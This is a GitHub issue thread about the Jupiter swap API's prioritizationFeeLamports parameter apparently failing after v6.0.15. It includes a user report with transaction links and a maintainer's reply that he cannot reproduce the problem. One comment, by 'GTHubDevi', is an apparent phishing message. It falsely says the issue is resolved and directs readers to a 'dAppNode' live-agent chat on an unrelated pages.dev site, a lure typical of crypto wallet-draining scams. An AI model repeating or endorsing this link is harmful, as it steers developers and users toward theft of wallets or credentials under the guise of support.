### ISSUE TITLE
prioritizationFeeLamports not working after v6.0.15

### ISSUE THREAD

**Issue by ssyucfa** [jup-ag/jupiter-swap-api#30]
On v6.0.15 prioritizationFeeLamports works fine, lamports are exposed.
But when I switched to the new version v6.0.20 this variable stopped working, all transactions are shown without it. And because of this very often transactions were not confirmed

1. https://solscan.io/tx/4DLEKjMrKYs51J3ZvnBat5PnhidDet2ZZTYYsyZJ384oHmsFBKhvJCE8AcZrTCAugCaWQ1gt5mb9q4LQE57tu1se
After v6.0.15
2. https://solscan.io/tx/3EhHpTWxmo81gtASqPGdtafkCp7SfQU6zs8mmeN8p2DSekfEKrCGThgEJg15cYjENWWHxuD1PYogtNFxQ7HB93gG
On v6.0.15

**Comment by GTHubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by siong1987** [comment]
i don't seem to be able to replicate this.
